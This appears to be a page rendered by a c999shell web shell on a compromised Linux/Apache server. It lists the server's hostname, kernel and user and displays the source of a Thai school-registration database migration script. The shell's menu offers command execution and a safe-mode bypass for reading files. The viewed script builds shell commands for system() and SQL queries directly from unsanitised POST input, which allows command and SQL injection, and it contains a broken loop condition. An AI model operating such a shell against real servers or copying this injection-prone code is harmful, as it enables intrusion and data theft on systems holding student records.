Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/xmigratex/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style.css" />
<?php
include_once "special_fld.php";
set_time_limit(0);
function findIndex($arr, $v){
$sf = sizeof($arr);
$index = 0;
for($i=0;i<$sf;$i++){
echo $arr[$i];
// if(strcmp($arr[$i],$v)==0){
// $rt[$index] = $i;
// $index++;
// }
}
return $rt;
}
$ts=microtime(true);
/*
if(empty($_GET))
echo "No GET variables";
else
print_r($_GET);
*/
$dbreg = $_POST["dbreg"];
$dbmoreg = $_POST["dbmoreg"];
$dbppc = $_POST["dbppc"];
$localhost_s = $_POST["localhost_s"];
$localhost_u = $_POST["localhost_u"];
$localhost_p = $_POST["localhost_p"];
$dbNo = $_POST["dbNo"];
$path_mysql = $_POST["path_mysql"];
if($dbNo==1) {
$oDB = "regpbri";
$moDB = $dbmoreg;
include_once "arr_pbri.php";
}elseif($dbNo==2) {
$oDB = $dbreg;
$moDB = $dbmoreg;
//$path_mysql = '/opt/mysql/bin/mysql';//'mysql';
include_once "arr_reg.php";
}elseif($dbNo==3) {
$oDB = $dbreg;
$moDB = $dbppc;
include_once "arr_people.php";
}
// ------------ connect
$ln_info = mysql_connect($localhost_s, $localhost_u, $localhost_p);
if (!$ln_info) {
echo "<font color='#FF0000'>$source_s";
die(' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error());
echo "</font >";
}else{
//echo "Connected $source_s successfully<br>";
}
$ln_reg = mysql_connect($localhost_s, $localhost_u, $localhost_p, true);
if (!$ln_reg) {
echo "<font color='#FF0000'>$source_s";
die(' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error());
echo "</font >";
}else{
//echo "Connected $source_s successfully<br>";
}
$ln_mo = mysql_connect($localhost_s, $localhost_u, $localhost_p, true);
if (!$ln_mo) {
echo "<font color='#FF0000'>$local_s";
die(' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error());
echo "</font >";
}else{
//echo "Connected $local_s successfully<br>";
}
// -------------- select DB
$db_info = mysql_select_db('information_schema', $ln_info);
//mysql_query("SET NAMES 'utf8'", $ln_info);
if (!$db_info) {
die ('ไม่สามารถเชื่อมต่อฐานข้อมูล information_schema ได้: ' . mysql_error());
}else{
//echo 'db_information_schema successfully<br>';
}
$db_reg = mysql_select_db($oDB, $ln_reg);
mysql_query("SET NAMES 'utf8'", $ln_reg);
if (!$db_reg) {
die ("ไม่สามารถเชื่อมต่อฐานข้อมูล $oDB ได้ โปรดตรวจสอบชื่อฐานข้อมูลอีกครั้ง : " . mysql_error());
}else{
echo "เชื่อมต่อฐานข้อมูล $oDB สำเร็จ<br>";
}
$db_mo = mysql_select_db($moDB, $ln_mo);
mysql_query("SET NAMES utf8", $ln_mo);
mysql_query("SET collation_connection = 'utf8_general_ci' ", $ln_mo);
if (!$db_mo) {
die ("ไม่สามารถเชื่อมต่อฐานข้อมูล $moDB ได้ โปรดตรวจสอบชื่อฐานข้อมูลอีกครั้ง: " . mysql_error());
}else{
echo "เชื่อมต่อ $moDB สำเร็จ<br><br>";
}
// --------------end select DB
if($dbNo==2) {
$ad = "$path_mysql -h '$localhost_s' -u '$localhost_u' -p'$localhost_p' -e 'DROP TABLE $dbmoreg.`rg_RealStudentAd` ; CREATE TABLE $dbmoreg.`rg_RealStudentAd` AS SELECT * FROM $dbreg.`rg_RealStudentAd`; '";
$last_line = system($ad, $retval);
if($retval){
echo "<font color='#FF0000'>ย้ายข้อมูล `rg_RealStudentAd` เกิดข้อผิดพลาด";
echo $retval.' <br>sql : '.$ad;
echo "</font><br>";
}
$de = "$path_mysql -h '$localhost_s' -u '$localhost_u' -p'$localhost_p' -e 'DROP TABLE $dbmoreg.`rg_RealStudentDe` ; CREATE TABLE $dbmoreg.`rg_RealStudentDe` AS SELECT * FROM $dbreg.`rg_RealStudentDe`; '";
$last_line = system($de, $retval);
if($retval){
echo "<font color='#FF0000'>ย้ายข้อมูล `rg_RealStudentDe` เกิดข้อผิดพลาด";
echo $retval.' <br>sql : '.$de;
echo "</font><br>";
}
unset($ad);
unset($de);
// -- ตัดเว้นวรรคในชื่อ ที่เกิน 1 ช่อง
$mo_name = "UPDATE $dbreg.`StudentBio` SET parentName = REPLACE(REPLACE(REPLACE(parentName ,'นาย','นาย '),'นาง','นาง '),'นางสาว','นางสาว ') ,parentName = REPLACE(REPLACE(REPLACE(parentName ,SPACE(4),SPACE(1)) ,SPACE(3),SPACE(1)),SPACE(2),SPACE(1)) ,parentName = TRIM(parentName) ,fatherName = REPLACE(REPLACE(REPLACE(fatherName ,SPACE(4),SPACE(1)) ,SPACE(3),SPACE(1)),SPACE(2),SPACE(1)) ,fatherName = REPLACE(REPLACE(REPLACE(fatherName ,'นาย ','นาย'),'นาง ','นาง'),'นางสาว ','นางสาว') ,fatherName = TRIM(fatherName) ,motherName = REPLACE(REPLACE(REPLACE(motherName ,SPACE(4),SPACE(1)) ,SPACE(3),SPACE(1)),SPACE(2),SPACE(1)) ,motherName = REPLACE(REPLACE(REPLACE(motherName ,'นาย ','นาย'),'นาง ','นาง'),'นางสาว ','นางสาว') ,motherName = TRIM(motherName)";
$rs = mysql_query($mo_name, $ln_reg);
if (!$rs) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $import_query;
die($message);
}
}
//echo '+++++++++++++++++++++++++++++++++++++<br><br>';
$sizeoftb = sizeof($sm);
echo $sizeoftb.'ตาราง <br>';
$records = 0;
$affected_records = 0;
?>
<table class='tb_1' width='100%' >
<tr align='center'>
<th width=20 rowspan='2'></th>
<th colspan='4'>ฐานข้อมูล <? echo $oDB;?></th>
<th colspan='4'>ฐานข้อมูล <? echo $moDB;?></th>
<th rowspan='2'>ฟิลด์ที่<br />เปลี่ยนแปลง</th>
</tr>
<tr align='center'>
<td class='h2'>ชื่อตาราง</td>
<td class='h2'>จำนวนฟิลด์<br />ที่พบ</td>
<td class='h2'>จำนวนฟิลด์ที่<br />คัดลอกข้อมูล</td>
<td class='h2'>จำนวน<br />แถวข้อมูล</td>
<td class='h2'>ตาราง<br /><? echo $moDB;?></td>
<td class='h2'>จำนวนฟิลด์<br />ที่พบ</td>
<td class='h2'>จำนวนฟิลด์<br />ที่จัดเก็บข้อมูล</td>
<td class='h2'>จำนวน<br />แถวข้อมูล</td>
</tr>
<?
for($tb_num=0; $tb_num < $sizeoftb; $tb_num++){
$otb_name = $sm[$tb_num]['old']['name'];
$motb_name = $sm[$tb_num]['new']['name'];
if($otb_name!='-'){
// หาจำนวนฟิลด์ จาก ฐานข้อมูล
$oQuery = "SELECT * FROM `COLUMNS` WHERE `TABLE_SCHEMA` LIKE '".$oDB."' AND `TABLE_NAME` LIKE '".$otb_name."'";
$moQuery = "SELECT * FROM `COLUMNS` WHERE `TABLE_SCHEMA` LIKE '$moDB' AND `TABLE_NAME` LIKE '".$motb_name."'";
$oRS = mysql_query($oQuery, $ln_info);
if (!$oRS) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $oQuery;
die($message);
}
$oFld_num = mysql_num_rows($oRS);
$moRS = mysql_query($moQuery, $ln_info);
if (!$moRS) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $moQuery;
die($message);
}
$moFld_num = mysql_num_rows($moRS);
// ความแตกต่างระหว่างฟิลด
$plus = sizeof($sm[$tb_num]['plus']);
$minus = sizeof($sm[$tb_num]['minus']);
$oFld_numA = sizeof($sm[$tb_num]['old']['fld']) - $plus;
$moFld_numA = sizeof($sm[$tb_num]['new']['fld']) - $minus ;
$Fld_diff = '';
if( $plus != 0 ){
$Fld_diff .= "+ $plus<br>";
}
if( $minus != 0 ){
$Fld_diff .= " - $minus";
//$rt = findIndex($sm[$tb_num]['new']['fld'], '-');
}
?>
<?
$num_row=-1;
if(1){//($plus == 0){
// normal
$query = "SELECT * FROM `$otb_name` WHERE 1;";
// echo $query.'<br>';
$result = mysql_query($query, $ln_reg);
$num_row = mysql_num_rows($result);
$message = "";
$affected = 0;
if ($num_row==0) {
// $message = 'Invalid query: ' . mysql_error() . "\n";
// $message = 'Whole query: ' . $query;
// echo "<td>$message</td>";
$num_row=0;
// die($message);
$num=1;
}else{
// Insert to
$nFld_name = "";
$oFld_name = "";
$fld_num = 0;
for($nfld=0; $nfld<sizeof($sm[$tb_num]['new']['fld']); $nfld++){
if(!in_array($nfld,$sm[$tb_num]['minus'])){
$fld_num++;
$nFld_name .= '`'.$sm[$tb_num]['new']['fld'][$nfld].'`';
$oFld_name .= '`'.$sm[$tb_num]['old']['fld'][$nfld].'`';
if( $fld_num < $moFld_numA ){
$nFld_name .= ', ';
$oFld_name .= ', ';
}
}
}
if($sm[$tb_num]['sql']=='-'){
$import_query = 'INSERT INTO `'.$moDB.'`.`'.$motb_name.'` ('.$nFld_name.') ';
$import_query.= 'SELECT '.$oFld_name.' FROM `'.$oDB.'`.`'.$otb_name.'`;';
}elseif(isset($sm[$tb_num]['qry'])){
$import_query = 'INSERT INTO `'.$moDB.'`.`'.$motb_name.'` ('.$nFld_name.') ';
$import_query.= $sm[$tb_num]['qry'];
//echo "<font size='1'>".$import_query."</font><br>";
}else{
$num=1;
while ($row = mysql_fetch_assoc($result)) {
$getdata=true;
// เงื่อนไขเฉพาะ ไม่เอาแถวนี้ ถ้า StudentMaster.officerId1 = NULL
if($motb_name == 'rg_Adviser'){ // sm.officerId1 = NULL
if($row['officerId1'] == ''){
$getdata=false;
}
}
if($getdata){
//if($otb_name == 'ProgramConfig') echo $row['programConfId'].'<br>';
// อาจเพิ่ม TRUNCATE TABLE $motb_name ลบข้อมูลของตาราง โดยไม่ลบโครงสร้าง
if($num==1){
$import_query = 'INSERT INTO `'.$motb_name.'` ('.$nFld_name.') VALUES ';
//}elseif($num==100){
// $import_query.= '; INSERT INTO `'.$motb_name.'` ('.$nFld_name.') VALUES ';
// $num=2;
}else{
$import_query .= ',';
}
$import_query .= '(';
$fld_num = 0;
for($i=0;$i<sizeof($sm[$tb_num]['new']['fld']);$i++){
if(!in_array($i,$sm[$tb_num]['minus'])){
$fld_num++;
$fld_name = $sm[$tb_num]['old']['fld'][$i];
$def_cond = $sm[$tb_num]['def']['fld'][$i];
//if($fld_name=='fatherName')
//{ echo " :$otb_name.$fld_name:$def_cond <br><br>"; }
// ฟิลด์ใหม่อ้างอิงจากไหน
$fld_name_pk = $sm[$tb_num]['old']['fld'][0];
$ref = $sm[$tb_num]['ref']['fld'][$i];
if($ref != '-'){
list($ref_tb,$ref_pk,$ref_fld) = preg_split("[-]",$ref);
if($ref_tb!=$otb_name){
$qref = "SELECT $ref_fld FROM `$otb_name` JOIN `$ref_tb` ON $otb_name.$ref_pk = $ref_tb.$ref_pk
WHERE $otb_name.$ref_pk = $row[$ref_pk] ;";
}else{
$qref = "SELECT $ref_fld FROM `$ref_tb`
WHERE $ref_pk = $row[$fld_name_pk] ;";
}
//echo "<td>$ref_tb</td>";
$rsRef = mysql_query($qref, $ln_reg);
if(mysql_num_rows($rsRef)>0){
$rref = mysql_fetch_assoc($rsRef);
if($rref[$ref_fld]!='') {
//if($fld_name=='fatherName')
//{ echo $rref[$ref_fld]." :$otb_name.$fld_name:$def_cond <br><br>"; }
// ค่าที่ได้จากการอ้างอิงมีค่ามา
if($def_cond!='-'){
//ตัดนามสกุล ใน studentBio
$import_query .= special_field($row,$ln_reg, $def_cond,$rref[$ref_fld]);
}else{
$data = (is_null($rref[$ref_fld]))?'NULL':$rref[$ref_fld];
$import_query .= "'".addslashes($data)."'";
//$import_query .= "'".addslashes($rref[$ref_fld])."'";
}
}elseif($def_cond!='-'){
$import_query .= special_field($row,$ln_reg, $def_cond);
}else{
$import_query .= "''";
}
}else{
//echo " fld_name :$fld_name ,ref : $ref ,def_cond : $def_cond<br>";
$rref=($fld_name!='-')?$row[$fld_name]:'';
if($def_cond!='-'){
$import_query .= special_field($row,$ln_reg, $def_cond,$rref);
}else{
$import_query .= "''";
}
}
//echo "$def_p ,".addslashes($row[$def_fld]).'<br>';
//}
}else{
// หาค่า default
$rref=($fld_name!='-')?$row[$fld_name]:'';
if($def_cond!='-'){
//echo " fld_name :$fld_name ,ref : $ref ,def_cond : $def_cond<br>";
$import_query .= special_field($row,$ln_reg, $def_cond,$rref);
// if($def_cond=='default/1/'){ echo $import_query.'<br>';}
}else{
//$import_query .= "''";
// ฟิลด์ใหม่ ข้อมูลเดิม
$data = (is_null($row[$fld_name]))?'NULL':"'".addslashes($row[$fld_name])."'";
$import_query .= $data;
}
}
if( $fld_num < $moFld_numA )
$import_query .= ', ';
}
}//END for
$import_query .= ')';
$num++;
} // getdata
} //while
} //else isset sql
//echo $import_query.'<br><br>';
// Insert คำสั่งลงตาราง
//if($num_row>1){
$rs = mysql_query($import_query, $ln_mo);
if (!$rs) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $import_query;
die($message);
}else{
$affected = mysql_affected_rows();
}
} // end !$result
} //$plus + $minus
?>
<tr>
<td><?=$tb_num+1?></td>
<td><?=$otb_name?></td>
<td><?=$oFld_num?></td>
<td><?=$oFld_numA?></td>
<td><?=$num_row;?></td>
<td><?=$motb_name?></td>
<td><?=$moFld_num?></td>
<td><?=$moFld_numA?></td>
<td><?=$affected;?></td>
<td><?=$Fld_diff;?></td>
<td><?=$message;?></td>
</tr>
<?
$records+=$num_row;
$affected_records+=$affected;
}else{
$moQuery = "SELECT * FROM `COLUMNS` WHERE `TABLE_SCHEMA` LIKE '$moDB' AND `TABLE_NAME` LIKE '".$motb_name."'";
$moRS = mysql_query($moQuery, $ln_info);
if (!$moRS) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $moQuery;
die($message);
}
$moFld_num = mysql_num_rows($moRS);
$moQuery = "SELECT * FROM `$motb_name`";
$moRS = mysql_query($moQuery, $ln_mo);
if (!$moRS) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $moQuery;
die($message);
}
$affected = mysql_num_rows($moRS);
?>
<tr><td><?=$tb_num+1?></td>
<td><?=$otb_name?> </td>
<td>-</td>
<td>-</td>
<td>-</td>
<td><?=$motb_name?></td>
<td><?=$moFld_num?></td>
<td>-</td>
<td><?=$affected?></td>
<td>-</td>
</tr>
<?
}// END if != '-'
} // END for $tb_num
$te=microtime(true);
$tt=($te-$ts)/60;
echo "<tr><td colspan=4></td><td >".$records."</td>";
echo "<td colspan=3></td><td >".$affected_records."</td><td ></td></tr>";
//echo "<td colspan=4>เวลา : $tt</td></tr>";
mysql_close($ln_info);
mysql_close($ln_reg);
mysql_close($ln_mo);
set_time_limit(30);
?>
</table> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]-- |